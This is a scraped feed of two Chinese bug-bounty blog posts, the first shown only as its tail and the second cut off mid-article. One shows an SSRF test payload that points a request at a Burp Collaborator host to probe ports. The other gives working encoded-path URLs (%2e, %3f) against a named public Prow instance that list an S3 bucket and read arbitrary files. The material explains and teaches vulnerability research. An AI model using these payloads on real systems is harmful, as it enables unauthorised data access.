leaf="">&#34;label&#34;</span></span><span leaf="">:</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;<a href="http://p8yfvg6nige7z2ndagpf3v181z7pve.burpcollaborator.net:80" target="_blank">http://p8yfvg6nige7z2ndagpf3v181z7pve.burpcollaborator.net:80</a>&#34;</span></span><span leaf="">,</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;value&#34;</span></span><span leaf="">:{</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;values&#34;</span></span><span leaf="">:[</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;&lt;html&gt;&lt;body&gt;ift3z4lojdng3fv7r68q5szjigz&lt;/body&gt;&lt;/html&gt;&#34;</span></span><span leaf="">],</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;unit&#34;</span></span><span leaf="">:</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;RAW&#34;</span></span><span leaf="">}}</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">端口 80 开放</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">如果对应的端口没有开放,那么会报错timeout/host unreachable：超时 / 主机不可达</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">典型的ssrf测试方法</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="box-sizing: border-box;text-align: center;display: inline-block;height: 38px;line-height: 42px;color: rgb(72, 179, 120);background-position: left center;background-repeat: no-repeat;background-attachment: initial;background-origin: initial;background-clip: initial;background-size: 63px;margin-top: 38px;font-size: 18px;margin-bottom: 10px;"><span leaf="">往期回顾</span></span></p><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=240c7f4f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRzLWJ9RlKKKsB4JY2LjAxphzcibLf9dQEEFVXqglXFlia0kgWmUpPZ0RXuyUAksZac8pSgE7aPCzGUqlvdqlbibvjJoztPBQiawtJg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style="box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span leaf="">参考</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://hackerone.com/reports/1300585" target="_blank">https://hackerone.com/reports/1300585</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=be830c97&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499397%26idx%3D1%26sn%3D7fce7b816f22db689ed012d92fe824b5">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 04 May 2026 10:00:00 +0800</pubDate>
    </item>
    <item>
      <title>云存储桶可以实现列对象的一种绕过思路</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499387&amp;idx=1&amp;sn=bb5a25d0d00e22b80ceebc2162ec23c0</link>
      <description></description>
      <content:encoded><![CDATA[<p>原创 <span>h1</span> <span>2026-05-01 10:01</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=a07a8ecf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F7xtecWUgCRwuXpvFiaKJbZMF2NYNzZHhLjRVSXuKOyMFDKnsUntIj9esennqSia5w3e8MMibGpOeMascKJ1iaNic5OQCaxiaByWzDmBKqpahtEDxA%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">云存储桶可以实现列对象的一种绕过思路</span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=1fcb0bc3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F7xtecWUgCRyEH1VDFoqB35UAc2J4Pib3HVleYu3Ffq4LoXiaCavibcsmXBUH7XyzDFYby2ryiaodbwz4l3wLht7scwaBvfwohe1FibGA75KkAdiaA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">正文</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">1.这里使用一个公开的 Prow 实例作为示例（实际漏洞是在私有项目测试中发现的，无法披露）：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://prow.falco.org" target="_blank">https://prow.falco.org</a></span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">1.漏洞接口如下：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf=""><a href="https://prow.falco.org/job-history/s3/falco-prow-logs/%2e%3f" target="_blank">https://prow.falco.org/job-history/s3/falco-prow-logs/%2e%3f</a></span></code></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Prow 原本只期望加载日志文本文件，并且会在 S3 URL 后自动追加 /latest.txt 进行签名。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">但是：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">通过传入 </span><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf="">/.</span></code><span leaf="">（即 %2e），可以访问 Bucket 的基础路径</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">通过编码的 ?（%3f），可以注释掉后面的 /latest.txt</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">因此最终被签名的 URL 实际变成：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf="">s3://falco-prow-logs/.?/latest.txt</span></code><span leaf=""> 效果是：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">实际签名的是 Bucket 根路径</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">返回的是整个 Bucket 的文件列表（类似目录 listing）</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">此外，这种技巧还可以读取任意文件：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf=""><a href="https://prow.falco.org/job-history/s3/falco-prow-logs/any.valid.file%3f" target="_blank">https://prow.falco.org/job-history/s3/falco-prow-logs/any.valid.file%3f</a></span></code></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">注意其绕过手法</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">核心问题有 3 个：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, 